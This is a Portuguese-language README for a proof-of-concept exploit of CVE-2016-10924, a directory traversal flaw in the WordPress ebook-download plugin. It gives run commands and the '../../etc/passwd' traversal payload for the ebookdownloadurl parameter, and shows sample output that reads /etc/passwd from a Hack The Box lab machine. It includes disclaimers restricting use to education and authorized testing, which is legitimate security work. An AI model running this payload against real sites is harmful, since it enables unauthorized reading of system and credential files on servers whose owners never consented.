
Script de exploit de Prova de Conceito (PoC) para a vulnerabilidade de Directory Traversal (CVE-2016-10924) encontrada no plugin ebook-download do WordPress (versões < 1.2). Essa vulnerabilidade permite leituras não autorizadas de arquivos por meio de uma solicitação GET forjada.
Este repositório contém um script de exploit Prova de Conceito (PoC) para a vulnerabilidade Directory Traversal (CVE-2016-10924) encontrada no plugin ebook-download do WordPress (versões < 1.2).
Essa vulnerabilidade permite leitura não autorizada de arquivos por meio de uma solicitação GET especialmente elaborada. O exploit utiliza um parâmetro chamado ebookdownloadurl para percorrer diretórios no servidor de destino.
ebook-download < 1.2 para WordPress/etc/passwd, manipulando o caminho do arquivo no parâmetro ebookdownloadurl.Nota: Este PoC é apenas para fins educacionais e de teste autorizado. O uso indevido dessas informações pode acarretar consequências legais.
requests (instale via pip install requests)Clone o repositório:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
Instale as Dependências:
pip install requests
Execute o Exploit:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
Especifique o caminho do arquivo a ser lido: Após executar o script, você será solicitado a informar um caminho de arquivo. Por exemplo:
../../../../../../../../../etc/passwd
Talvez seja necessário ajustar o número de ../ com base na localização do webroot no ambiente de destino.
Sair:
exit, quit ou pressione Enter em um prompt vazio para sair.Eu usei este exploit na máquina "Backdoor", uma máquina aposentada do Hack The Box:
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.
Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
Este projeto destina-se exclusivamente a fins educacionais e de teste de segurança legítimo.
Não use as informações ou scripts deste repositório em qualquer sistema para o qual você não tenha permissão explícita para testar.
O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.
Este projeto está licenciado sob a GNU 2.0 License. Sinta-se à vontade para usá-lo e modificá-lo, mas dê os devidos créditos.
Referências